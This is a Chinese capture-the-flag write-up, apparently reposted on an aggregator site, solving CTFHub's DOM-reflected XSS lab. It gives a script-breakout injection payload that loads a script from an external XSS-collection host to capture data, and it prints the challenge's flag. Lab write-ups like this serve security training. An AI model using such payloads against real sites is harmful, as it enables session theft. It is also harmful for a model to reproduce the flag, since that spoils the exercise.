当前位置: 首页 > article >正文

CTFHUB技能树之XSS——DOM反射

开启靶场,打开链接:

直接指明是DOM反射型的XSS漏洞


右键查看页面源代码,Ctrl F关键词”CTFHub is very“:

可以看到存在xss漏洞


不过得先闭合一下:

闭合例子如下:

';</sCrIpT><sCRiPt sRC=//xs.pe/6b6></sCrIpT><sCRiPt>

(这里还是用TLXSS平台的配置代码)

之后去TLXSS平台中查看获取到的记录,成功获取到flag:

ctfhub{72ff306631e7b12550ad4969}


http://www.kler.cn/news/361050.html

相关文章:

  • JMeter详细介绍和相关概念
  • LLM----BERT+HuggingFace理论及基础入门实战
  • 【Flutter】基础入门:自定义Widget
  • 空文件夹,python项目来启动
  • 《Python基础教程》笔记(ch0-1)
  • 2024年软件设计师中级(软考中级)详细笔记【7】面向对象技术(下)23种设计模式(分值10+)
  • js读取.txt文件内容
  • RIP协议
  • 刷爆leetccode Day5
  • 7-1 大写字母转换为小写字母(C++;cin;cout)
  • 数据库表的创建
  • Spring配置/管理bean-IOC(控制反转) 非常详细!基于XML及其注解!案例分析! 建议复习收藏!
  • 开源图像超分ECBSR项目源码分析
  • L1练习-鸢尾花数据集处理(分类/聚类)
  • STM32CubeIDE(Eclipse)Post-build steps添加带参.exe实现全流程(2):带参调用.exe的几种方法
  • 搭建知识库 | 知识管理在汽车行业中的作用
  • 缓存框架JetCache源码解析-缓存变更通知机制
  • 建库建表练习
  • c语言 atoi 函数的功能和模拟实现
  • YOLO11改进 | 注意力机制 | 正确的 Self-Attention 与 CNN 融合范式,性能速度全面提升【独家创新】